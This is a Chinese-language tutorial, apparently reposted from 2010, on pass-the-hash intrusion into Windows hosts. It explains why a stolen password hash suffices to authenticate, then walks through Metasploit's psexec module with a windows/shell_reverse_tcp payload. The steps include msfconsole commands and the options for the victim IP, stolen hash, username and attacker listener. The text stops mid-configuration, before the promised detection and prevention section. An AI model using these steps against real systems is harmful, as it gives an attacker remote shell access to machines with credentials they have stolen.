传递哈希入侵技术
来源:互联网 发布:java奇数偶数的和 编辑:程序博客网 时间:2024/05/18 17:00
Copyright (c) 2010 Czy Invicta <Hack01@Live!cn>
All rights reserved.
前言
~~~~~~
确保密码复杂的策略使密码不能被恶意获取,是安全人员很常见的一个重要话题。而我在这篇文章中不会概述如何通过哈希和存储信息破解系统密码,在本文将侧重于演示通过窃取的密码哈希顺利侵入目标系统。我还将介绍如何检测并预防这种入侵的措施。
哈希在数据包的级别
~~~~~~~~~~~~~~~~~~~~
每当创建一个Windows帐户密码都会变成一个哈希密码。散列是一个加密函数,它接受一个任意大小的字符串作为数据的结果,是运用在数学上的加密功能,并返回一个固定大小的字符串。当你尝试访问一个由用户名和密码验证保护的主机,计算机会对你输入的密码执行密码的哈希函数计算,并提交给主机,以便可以与数据库比较取得认证。
现在,考虑一下替代方案。如果我们手动与主机建立连接,但是我们的用户名和密码并不正确,难道我们的管理员用户名和密码哈希被盗用了吗?我们所做的是获得该主机的管理权限。请记住,所有主机所关心的是接收一个匹配的哈希值。这意味着你不必执行单向散列函数的密码,你只需要提供哈希,这是对此入侵的基础。
使用Metasploit传递哈希
~~~~~~~~~~~~~~~~~~~~~~~
为了执行这项任务,我们将利用一个已被盗取哈希的受害者机器。为了执行这种攻击,我们将需要两个东西。首先,我们将需要被盗的管理员用户的哈希值。目前,地下组织对获取密码哈希值流行着许多不同的方法,而我们在这里需要利用Metasploit执行入侵。
Metasploit是由HD Moore免费提供的渗透测试框架。同时,我们在这里使用BT4 Linux Live,可以从http://www.backtrack-linux.org/?lang=zh下载,然后,你会发现Metasploit位于/pentest/exploits/framework3目录。
随着我们窃取的哈希值和手头的Metasploit,我们可以开始行动了。首先开启终端并访问/pentest/exploits/framework3目录,之后键入“ ./msfconsole”,这样以能够作为Metasploit启动控制台。
root@czy:~# cd /pentest/exploits/framework3/
root@czy:/pentest/exploits/framework3# ./msfconsole
msf >
Metasploit是一个框架,对各种模块的执行取决于行为。在这种情况下,我们将使用Psexec模块。Psexec是一个很普通的工具(不是特定于Metasploit),用于执行远程系统上的进程和输出重定向数据流。为了能够使用这个模块,键入“use windows\smb\psexec”并按回车键。之后,在Shell中的提示符会发生改变,以反映该模块正处于使用状态。
msf > use windows/smb/psexec
msf > exploit(psexec) >
然后,我们必须设置有效载荷。一旦账户和哈希已向我们提供适当的身份严重的有效载荷,我们将使用Psexec执行。在这种情况下往往存在着许多恶意意图,而不是一个刚刚公布的具体方案,我们要执行一个命令Shell,可以用它来执行许多讨厌的且重复的命令。这样做更有效的方法之一是使用反向TCP Shell。为了使用这个有效载荷,键入“set payload windows/shell_reverse_tcp”。
msf exploit(psexec) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(psexec) >
为了使用这个模块和有效载荷,我们不得不配置一些选项。为了我看到这些选项,你可以键入“show options”并按回车键。
msf exploit(psexec) > show options
Module options:
Payload option (windows/shell_reverse_tcp):
Exploit target:
msf exploit(psexec) >
为了配置选项,我们需要使用语法“set [选项名] [值]”。其值应设置为:
·RHOST - 受害者的IP地址
·SMBPass - 受害者被盗的哈希
·SMBUser -受害者的用户名
·LHOST - 你执行入侵行动的IP地址
在大多数情况下,仅有4个选项需要配置,其它可使用默认配置。
msf exploit(psexec) > show options
Module options: